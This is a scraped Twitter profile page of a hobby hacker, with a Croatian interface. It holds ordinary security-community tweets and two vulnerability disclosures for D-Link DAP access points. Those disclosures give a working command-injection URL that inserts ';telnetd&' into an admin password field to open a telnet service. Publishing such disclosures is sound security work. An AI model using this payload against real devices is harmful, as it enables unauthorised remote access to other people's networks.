Twitter | Pretraživanje | |
Jesse
Electrician and hobby hackerman/programmer. Admin at LaptopHackingCoffee
10
Tweetovi
32
Pratim
39
Osobe koje vas prate
Tweetovi
Jesse 3. velj
Just got my Black Hat Go book. Looking good, excited to get started!
Reply Retweet Označi sa "sviđa mi se"
Jesse 6. pro
Odgovor korisniku/ci @benwick921
People a lot smarter than me have told me it is. I don’t have the time or knowledge to check the crypto myself. But I believe them.
Reply Retweet Označi sa "sviđa mi se"
Jesse 5. pro
Verifying myself: I am amijesse on . A-eEHG6pUI7hBjakZgNSvDroSm5YiqS-xwnn /
Reply Retweet Označi sa "sviđa mi se"
Jesse proslijedio/la je tweet
Internet Of Insecurity 13. lis
As mentioned on the most recent "Privacy Security and OSINT Show" we've released a new private URL shortener which is open source with absolutely no logging.
Reply Retweet Označi sa "sviđa mi se"
Jesse proslijedio/la je tweet
Jeremy Elder 2. srp
Odgovor korisniku/ci @Namecheap @jared_perry @Wh1t3Rabbit
any progress guys? 5 years seems ample time
Reply Retweet Označi sa "sviđa mi se"
Jesse 27. velj
The vuln in DLINK DAP-1325 I posted a couple weeks ago (RCE via a CSRF through anyone connected to the access point) also affects the DAP-1530 and DAP-1610 -- http://dlinkap.local/goform/setSysAdm?admuser=admin&admpass=pass;telnetd&;
Reply Retweet Označi sa "sviđa mi se"
Jesse 16. velj
You guys gave these “posters” to my dad roughly 20 years ago and we recently found them in storage.
Reply Retweet Označi sa "sviđa mi se"
Jesse proslijedio/la je tweet
x0rz 14. velj
Bettercap looks great! Nice alternative to the good old aircrack-ng suite 👍
Reply Retweet Označi sa "sviđa mi se"
Jesse 12. velj
That's some pretty bad anti advice.
Reply Retweet Označi sa "sviđa mi se"
Jesse 10. velj
Vulnerability in DLINK DAP-1325 Remote Code Execution via a CSRF through anyone connected to the access point. http://dlinkap.local/goform/setSysAdm?admuser=admin&admpass=pass;telnetd&;
Reply Retweet Označi sa "sviđa mi se"